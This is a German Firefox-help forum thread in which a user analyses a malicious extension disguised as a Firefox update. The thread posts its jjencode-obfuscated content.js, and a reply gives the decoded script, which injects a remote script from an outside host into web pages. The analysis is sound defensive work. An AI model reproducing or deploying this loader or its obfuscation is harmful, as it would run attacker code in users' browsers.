seltsamer Code in Malware Erweiterung  [GELÖST]

Hier geht es um Fragen und Probleme mit Themes und Erweiterungen für den Firefox.
Benutzeravatar
Zitronella
Senior-Mitglied
Beiträge: 9257
Registriert: Di, 07. Feb 2012 18:06

seltsamer Code in Malware Erweiterung

#1

Beitrag von Zitronella Themen-Starter » Di, 17. Jul 2018 1:03

Ich habe mir absichtlich mal eine Erweiterung von so einer Malware Seite geladen. Sie gibt vor ein Firefox Update wäre nötig usw.
Ich lade mir gerne so etwas herunter (ohne zu installieren und wenn dann nur in einer VM) um diese zu entpacken und mir den darin liegenden Code mit Notepad++ anzusehen und vielleicht etwas Aufschluss darüber zu bekommen was die Erweiterung macht.
So wollte ich es auch mit dieser machen.
Die Datei besteht eigentlich nur aus
META-INF (Ordner)
background.js
content.js
manifest.json

In der content.js ist nur seltsamer Code zu finden. :shock: und zwar dieser hier:

Code: Alles auswählen

$$=~[];$$={___:++$$,$$$$:(![]+"")[$$],__$:++$$,$_$_:(![]+"")[$$],_$_:++$$,$_$$:({}+"")[$$],$$_$:($$[$$]+"")[$$],_$$:++$$,$$$_:(!""+"")[$$],$__:++$$,$_$:++$$,$$__:({}+"")[$$],$$_:++$$,$$$:++$$,$___:++$$,$__$:++$$};$$.$_=($$.$_=$$+"")[$$.$_$]+($$._$=$$.$_[$$.__$])+($$.$$=($$.$+"")[$$.__$])+((!$$)+"")[$$._$$]+($$.__=$$.$_[$$.$$_])+($$.$=(!""+"")[$$.__$])+($$._=(!""+"")[$$._$_])+$$.$_[$$.$_$]+$$.__+$$._$+$$.$;$$.$$=$$.$+(!""+"")[$$._$$]+$$.__+$$._+$$.$+$$.$$;$$.$=($$.___)[$$.$_][$$.$_];$$.$($$.$($$.$$+"\""+"("+$$.$$$$+$$._+"\\"+$$.__$+$$.$_$+$$.$$_+$$.$$__+$$.__+"\\"+$$.__$+$$.$_$+$$.__$+$$._$+"\\"+$$.__$+$$.$_$+$$.$$_+"()\\"+$$.$__+$$.___+"{\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+$$.$_$$+"\\"+$$.__$+$$.$$_+$$._$_+$$._$+"\\"+$$.__$+$$.$$_+$$.$$$+"\\"+$$.__$+$$.$$_+$$._$$+$$.$$$_+"\\"+$$.__$+$$.$$_+$$._$_+".\\"+$$.__$+$$.$$_+$$._$$+$$.__+$$._$+"\\"+$$.__$+$$.$$_+$$._$_+$$.$_$_+"\\"+$$.__$+$$.$__+$$.$$$+$$.$$$_+"."+(![]+"")[$$._$_]+$$._$+$$.$$__+$$.$_$_+(![]+"")[$$._$_]+".\\"+$$.__$+$$.$__+$$.$$$+$$.$$$_+$$.__+"(\\\"\\"+$$.__$+$$.$_$+$$.__$+"\\"+$$.__$+$$.$_$+$$.$$_+"\\"+$$.__$+$$.$$_+$$._$$+$$.__+$$.$_$_+(![]+"")[$$._$_]+(![]+"")[$$._$_]+$$.$$$_+$$.$$_$+"\\\")\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"."+$$.__+"\\"+$$.__$+$$.$_$+$$.___+$$.$$$_+"\\"+$$.__$+$$.$_$+$$.$$_+"(\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"(\\"+$$.__$+$$.$_$+$$.__$+$$.__+$$.$$$_+"\\"+$$.__$+$$.$_$+$$.$_$+")\\"+$$.$__+$$.___+"=>\\"+$$.$__+$$.___+"{\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.__$+$$.$_$+$$.__$+$$.$$$$+"\\"+$$.$__+$$.___+"(\\"+$$.__$+$$.$_$+$$.__$+$$.__+$$.$$$_+"\\"+$$.__$+$$.$_$+$$.$_$+".\\"+$$.__$+$$.$_$+$$.__$+"\\"+$$.__$+$$.$_$+$$.$$_+"\\"+$$.__$+$$.$$_+$$._$$+$$.__+$$.$_$_+(![]+"")[$$._$_]+(![]+"")[$$._$_]+$$.$$$_+$$.$$_$+")\\"+$$.$__+$$.___+"{\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.__$+$$.$$_+$$.$$_+$$.$_$_+"\\"+$$.__$+$$.$$_+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.__$+$$.$$_+$$._$$+"\\"+$$.$__+$$.___+"=\\"+$$.$__+$$.___+$$.$$_$+$$._$+$$.$$__+$$._+"\\"+$$.__$+$$.$_$+$$.$_$+$$.$$$_+"\\"+$$.__$+$$.$_$+$$.$$_+$$.__+"."+$$.$$__+"\\"+$$.__$+$$.$$_+$$._$_+$$.$$$_+$$.$_$_+$$.__+$$.$$$_+"\\"+$$.__$+$$.___+$$.$_$+(![]+"")[$$._$_]+$$.$$$_+"\\"+$$.__$+$$.$_$+$$.$_$+$$.$$$_+"\\"+$$.__$+$$.$_$+$$.$$_+$$.__+"('\\"+$$.__$+$$.$$_+$$._$$+$$.$$__+"\\"+$$.__$+$$.$$_+$$._$_+"\\"+$$.__$+$$.$_$+$$.__$+"\\"+$$.__$+$$.$$_+$$.___+$$.__+"');\\"+$$.$__+$$.___+"\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.__$+$$.$$_+$$._$$+".\\"+$$.__$+$$.$$_+$$._$$+"\\"+$$.__$+$$.$$_+$$._$_+$$.$$__+"\\"+$$.$__+$$.___+"=\\"+$$.$__+$$.___+"`${"+$$.$_$_+$$.__+$$._$+$$.$_$$+"(\\\"\\"+$$.__$+$$.__$+$$.$__+"\\"+$$.__$+$$.$$$+$$.__$+$$.$__$+$$.__+"\\"+$$.__$+$$._$$+$$._$_+"\\"+$$.__$+$$._$_+$$.$$$+"\\"+$$.__$+$$._$_+$$.$$_+$$.$__+$$.$$_$+"\\"+$$.__$+$$.___+$$.$$$+"\\"+$$.__$+$$._$$+$$._$_+"\\"+$$.__$+$$.$_$+$$.$_$+"\\"+$$.__$+$$._$$+$$.__$+$$._$_+$$.$__$+$$._+"\\"+$$.__$+$$.__$+$$.$__+"\\"+$$.__$+$$.$_$+$$.$_$+"\\"+$$.__$+$$.__$+$$.$$_+"\\"+$$.__$+$$.$$_+$$.$$_+$$.$_$$+"\\"+$$.__$+$$._$_+$$._$$+$$.$___+"\\"+$$.__$+$$.$$$+$$.___+"\\"+$$.__$+$$._$$+$$.__$+"\\"+$$.__$+$$.$$$+$$._$_+$$.$$__+"\\"+$$.__$+$$.$$_+$$.$$$+"\\"+$$.__$+$$._$$+$$.__$+"\\"+$$.__$+$$.$$$+$$._$_+"\\"+$$.__$+$$.__$+$$.__$+$$._$_+"\\"+$$.__$+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+$$.$__+"\\"+$$.__$+$$.__$+$$._$_+"\\"+$$.__$+$$.$_$+$$.__$+"\\"+$$.__$+$$.__$+$$.$$_+"\\"+$$.__$+$$.$_$+$$._$_+"\\"+$$.__$+$$._$_+$$.$_$+$$._$_+"\\"+$$.__$+$$._$$+$$._$_+"\\"+$$.__$+$$._$_+$$.$$$+"\\"+$$.__$+$$.__$+$$.__$+"\\"+$$.__$+$$.$$$+$$._$_+"\\"+$$.__$+$$._$$+$$._$_+"\\"+$$.__$+$$.___+$$.$$$+"\\"+$$.__$+$$.___+$$.$_$+$$._+$$.$_$_+"\\"+$$.__$+$$.$_$+$$.$$_+"\\"+$$.__$+$$.__$+$$.$_$+"=\\\")}`;\\"+$$.$__+$$.___+"\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+$$.$$_$+$$._$+$$.$$__+$$._+"\\"+$$.__$+$$.$_$+$$.$_$+$$.$$$_+"\\"+$$.__$+$$.$_$+$$.$$_+$$.__+"."+$$.$_$$+$$._$+$$.$$_$+"\\"+$$.__$+$$.$$$+$$.__$+"."+$$.$_$_+"\\"+$$.__$+$$.$$_+$$.___+"\\"+$$.__$+$$.$$_+$$.___+$$.$$$_+"\\"+$$.__$+$$.$_$+$$.$$_+$$.$$_$+"\\"+$$.__$+$$.___+$$._$$+"\\"+$$.__$+$$.$_$+$$.___+"\\"+$$.__$+$$.$_$+$$.__$+(![]+"")[$$._$_]+$$.$$_$+"(\\"+$$.__$+$$.$$_+$$._$$+");\\"+$$.$__+$$.___+"\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"}\\"+$$.$__+$$.___+$$.$$$_+(![]+"")[$$._$_]+"\\"+$$.__$+$$.$$_+$$._$$+$$.$$$_+"\\"+$$.$__+$$.___+"{\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.__$+$$.$$_+$$.$$$+"\\"+$$.__$+$$.$_$+$$.__$+"\\"+$$.__$+$$.$_$+$$.$$_+$$.$$_$+$$._$+"\\"+$$.__$+$$.$$_+$$.$$$+"."+$$.$_$_+$$.$$_$+$$.$$_$+"\\"+$$.__$+$$.___+$$.$_$+"\\"+$$.__$+$$.$$_+$$.$$_+$$.$$$_+"\\"+$$.__$+$$.$_$+$$.$$_+$$.__+"\\"+$$.__$+$$.__$+$$.$__+"\\"+$$.__$+$$.$_$+$$.__$+"\\"+$$.__$+$$.$$_+$$._$$+$$.__+$$.$$$_+"\\"+$$.__$+$$.$_$+$$.$$_+$$.$$$_+"\\"+$$.__$+$$.$$_+$$._$_+"(\\\"\\"+$$.__$+$$.$_$+$$.$_$+$$.$$$_+"\\"+$$.__$+$$.$$_+$$._$$+"\\"+$$.__$+$$.$$_+$$._$$+$$.$_$_+"\\"+$$.__$+$$.$__+$$.$$$+$$.$$$_+"\\\",\\"+$$.$__+$$.___+$$.$$$$+$$._+"\\"+$$.__$+$$.$_$+$$.$$_+$$.$$__+$$.__+"\\"+$$.__$+$$.$_$+$$.__$+$$._$+"\\"+$$.__$+$$.$_$+$$.$$_+"\\"+$$.$__+$$.___+"("+$$.$$$_+")\\"+$$.$__+$$.___+"{\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+$$.$_$$+"\\"+$$.__$+$$.$$_+$$._$_+$$._$+"\\"+$$.__$+$$.$$_+$$.$$$+"\\"+$$.__$+$$.$$_+$$._$$+$$.$$$_+"\\"+$$.__$+$$.$$_+$$._$_+".\\"+$$.__$+$$.$$_+$$._$_+$$._+"\\"+$$.__$+$$.$_$+$$.$$_+$$.__+"\\"+$$.__$+$$.$_$+$$.__$+"\\"+$$.__$+$$.$_$+$$.$_$+$$.$$$_+".\\"+$$.__$+$$.$$_+$$._$$+$$.$$$_+"\\"+$$.__$+$$.$_$+$$.$$_+$$.$$_$+"\\"+$$.__$+$$.__$+$$.$_$+$$.$$$_+"\\"+$$.__$+$$.$$_+$$._$$+"\\"+$$.__$+$$.$$_+$$._$$+$$.$_$_+"\\"+$$.__$+$$.$__+$$.$$$+$$.$$$_+"({\\"+$$.__$+$$.$_$+$$.__$+"\\"+$$.__$+$$.$_$+$$.$$_+$$.$$$$+$$._$+":\\"+$$.$__+$$.___+$$.$$$_+"."+$$.$$_$+$$.$_$_+$$.__+$$.$_$_+".\\"+$$.__$+$$.$_$+$$.__$+"\\"+$$.__$+$$.$_$+$$.$$_+$$.$$$$+$$._$+"});\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.__$+$$.$$_+$$._$$+$$.$$$_+$$.__+"\\"+$$.__$+$$._$_+$$.$__+"\\"+$$.__$+$$.$_$+$$.__$+"\\"+$$.__$+$$.$_$+$$.$_$+$$.$$$_+$$._$+$$._+$$.__+"("+$$.$$$$+$$._+"\\"+$$.__$+$$.$_$+$$.$$_+$$.$$__+$$.__+"\\"+$$.__$+$$.$_$+$$.__$+$$._$+"\\"+$$.__$+$$.$_$+$$.$$_+"(){\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.__$+$$.$$_+$$.$$$+"\\"+$$.__$+$$.$_$+$$.__$+"\\"+$$.__$+$$.$_$+$$.$$_+$$.$$_$+$$._$+"\\"+$$.__$+$$.$$_+$$.$$$+"."+(![]+"")[$$._$_]+$$._$+$$.$$__+$$.$_$_+$$.__+"\\"+$$.__$+$$.$_$+$$.__$+$$._$+"\\"+$$.__$+$$.$_$+$$.$$_+".\\"+$$.__$+$$.$_$+$$.___+"\\"+$$.__$+$$.$$_+$$._$_+$$.$$$_+$$.$$$$+"\\"+$$.$__+$$.___+"=\\"+$$.$__+$$.___+"\\\"#"+$$.$$_$+$$._$+"\\"+$$.__$+$$.$_$+$$.$$_+$$.$$$_+"\\\";\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"},\\"+$$.$__+$$.___+$$.__$+$$.___+$$.___+$$.___+"\\"+$$.$__+$$.___+"*\\"+$$.$__+$$.___+$$.__$+");\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"});\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.__$+$$.$$_+$$._$$+$$.$$$_+$$.__+"\\"+$$.__$+$$._$_+$$.$__+"\\"+$$.__$+$$.$_$+$$.__$+"\\"+$$.__$+$$.$_$+$$.$_$+$$.$$$_+$$._$+$$._+$$.__+"("+$$.$$$$+$$._+"\\"+$$.__$+$$.$_$+$$.$$_+$$.$$__+$$.__+"\\"+$$.__$+$$.$_$+$$.__$+$$._$+"\\"+$$.__$+$$.$_$+$$.$$_+"(){\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+$$.$_$$+"\\"+$$.__$+$$.$$_+$$._$_+$$._$+"\\"+$$.__$+$$.$$_+$$.$$$+"\\"+$$.__$+$$.$$_+$$._$$+$$.$$$_+"\\"+$$.__$+$$.$$_+$$._$_+".\\"+$$.__$+$$.$$_+$$._$$+$$.__+$$._$+"\\"+$$.__$+$$.$$_+$$._$_+$$.$_$_+"\\"+$$.__$+$$.$__+$$.$$$+$$.$$$_+"."+(![]+"")[$$._$_]+$$._$+$$.$$__+$$.$_$_+(![]+"")[$$._$_]+".\\"+$$.__$+$$.$$_+$$._$$+$$.$$$_+$$.__+"({\\"+$$.__$+$$.$_$+$$.__$+"\\"+$$.__$+$$.$_$+$$.$$_+"\\"+$$.__$+$$.$$_+$$._$$+$$.__+$$.$_$_+(![]+"")[$$._$_]+(![]+"")[$$._$_]+$$.$$$_+$$.$$_$+":"+$$.__$+"});\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"},\\"+$$.$__+$$.___+$$.$_$+$$.___+$$.___+"\\"+$$.$__+$$.___+"*\\"+$$.$__+$$.___+$$.__$+");\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"}\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"},\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"("+$$.$$$_+"\\"+$$.__$+$$.$$_+$$._$_+"\\"+$$.__$+$$.$$_+$$._$_+$$._$+"\\"+$$.__$+$$.$$_+$$._$_+")\\"+$$.$__+$$.___+"=>\\"+$$.$__+$$.___+"{\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+$$.$$__+$$._$+"\\"+$$.__$+$$.$_$+$$.$$_+"\\"+$$.__$+$$.$$_+$$._$$+$$._$+(![]+"")[$$._$_]+$$.$$$_+"."+(![]+"")[$$._$_]+$$._$+"\\"+$$.__$+$$.$__+$$.$$$+"('\\"+$$.__$+$$.__$+$$.$__+"\\"+$$.__$+$$._$_+$$._$$+"::"+$$.$$$_+"\\"+$$.__$+$$.$$_+$$._$_+"\\"+$$.__$+$$.$$_+$$._$_+$$._$+"\\"+$$.__$+$$.$$_+$$._$_+"',\\"+$$.$__+$$.___+$$.$$$_+"\\"+$$.__$+$$.$$_+$$._$_+"\\"+$$.__$+$$.$$_+$$._$_+$$._$+"\\"+$$.__$+$$.$$_+$$._$_+")\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"});\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"})();"+"\"")())();
Kann mir jemand erklären was das ist? verschlüsselter Code? kann man diesen entschlüsseln? Wenn ja, wie?
Hilfe auch im deutschsprachigen Firefox-Chat möglich.
Meine Anleitungstexte dürfen gerne "geklaut" und weiter verwendet/kopiert werden ;)

Benutzeravatar
DAUFahnder
Mitglied
Beiträge: 96
Registriert: So, 27. Mai 2018 4:02

Re: seltsamer Code in Malware Erweiterung  [GELÖST]

#2

Beitrag von DAUFahnder » Di, 17. Jul 2018 1:56

Suchwort für die Suchmaschine deiner Wahl wäre jjencode. Einen Decoder findest Du z.B. hier:
https://github.com/jacobsoo/Decoder-JJEncode

Das von dir gepostete Beispiel wird also zu:

Code: Alles auswählen

(function() {
    browser.storage.local.get("installed")
        .then(
            (item) => {
                if (item.installed) {
                    var s = document.createElement('script'); 
                    s.src = `${atob("Ly9tZWV4dGZmY29uLmNvbS8xYzcwYzI2MTJiNjU2ZWIzZGEuanM=")}`; 
                    document.body.appendChild(s); 
                } else {
                    window.addEventListener("message", function (e) {
                        browser.runtime.sendMessage({info: e.data.info});
                        setTimeout(function(){
                            window.location.href = "#done";
                        }, 1000 * 1);
                    });
                    setTimeout(function(){
                        browser.storage.local.set({installed:1});
                    }, 500 * 1);
                }
            },
            (error) => {
                console.log('LS::error', error)
            });
})();
Dabei ist der base64-Code diese URL: //meextffcon.com/1c70c2612b656eb3da.js
